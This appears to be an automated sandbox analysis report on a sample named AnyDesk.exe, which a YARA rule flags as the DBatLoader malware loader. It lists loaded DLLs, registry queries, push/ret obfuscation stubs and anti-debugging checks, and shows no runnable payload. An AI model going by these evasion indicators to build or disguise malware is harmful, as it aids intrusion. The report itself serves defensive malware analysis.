Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Section loaded: ??.dll	Jump to behavior

Source: C:\Users\user\Desktop\AnyDesk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: AnyDesk.exe

Static file information: File size 1299968 > 1048576

Source:	Binary string: easinvoker.pdb source: AnyDesk.exe, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2119845710.000000007FA90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: AnyDesk.exe, 00000000.00000003.2120469469.00000000027D1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368038850.0000000002A0B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2119845710.000000007FA90000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 0.2.AnyDesk.exe.2b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B3894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02B3894C

Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B4D2FC push 02B4D367h; ret	0_2_02B4D35F
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B263B0 push 02B2640Bh; ret	0_2_02B26403
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B263AE push 02B2640Bh; ret	0_2_02B26403
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B2332C push eax; ret	0_2_02B23368
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B4C378 push 02B4C56Eh; ret	0_2_02B4C566
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B2C349 push 8B02B2C1h; ret	0_2_02B2C34E
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B4D0AC push 02B4D125h; ret	0_2_02B4D11D
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3306B push 02B330B9h; ret	0_2_02B330B1
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3306C push 02B330B9h; ret	0_2_02B330B1
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B4D1F8 push 02B4D288h; ret	0_2_02B4D280
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3F108 push ecx; mov dword ptr [esp], edx	0_2_02B3F10D
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B4D144 push 02B4D1ECh; ret	0_2_02B4D1E4
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B26782 push 02B267C6h; ret	0_2_02B267BE
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B26784 push 02B267C6h; ret	0_2_02B267BE
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B2D5A0 push 02B2D5CCh; ret	0_2_02B2D5C4
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B4C570 push 02B4C56Eh; ret	0_2_02B4C566
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B2C56C push ecx; mov dword ptr [esp], edx	0_2_02B2C571
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3AAE0 push 02B3AB18h; ret	0_2_02B3AB10
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B38AD8 push 02B38B10h; ret	0_2_02B38B08
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3AADF push 02B3AB18h; ret	0_2_02B3AB10
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B2CA4E push 02B2CD72h; ret	0_2_02B2CD6A
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B2CBEC push 02B2CD72h; ret	0_2_02B2CD6A
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3886C push 02B388AEh; ret	0_2_02B388A6
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B94850 push eax; ret	0_2_02B94920
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B3790C push 02B37989h; ret	0_2_02B37981
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B36946 push 02B369F3h; ret	0_2_02B369EB
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B36948 push 02B369F3h; ret	0_2_02B369EB
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B35E7C push ecx; mov dword ptr [esp], edx	0_2_02B35E7E
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: 0_2_02B32F60 push 02B32FD6h; ret	0_2_02B32FCE

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B3AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02B3AB1C

Source: C:\Users\user\Desktop\AnyDesk.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\AnyDesk.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\AnyDesk.exe

Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B25908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02B25908

Source: AnyDesk.exe, 00000000.00000002.3366823048.00000000005D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWo
Source: AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.00000000005D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\AnyDesk.exe

API call chain: ExitProcess graph end node

graph_0-35291

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B3F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_02B3F744

Source: C:\Users\user\Desktop\AnyDesk.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B3894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02B3894C

Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02B25ACC
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: GetLocaleInfoA,	0_2_02B2A7C4
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02B25BD8
Source: C:\Users\user\Desktop\AnyDesk.exe	Code function: GetLocaleInfoA,	0_2_02B2A810

Source: C:\Users\user\Desktop\AnyDesk.exe

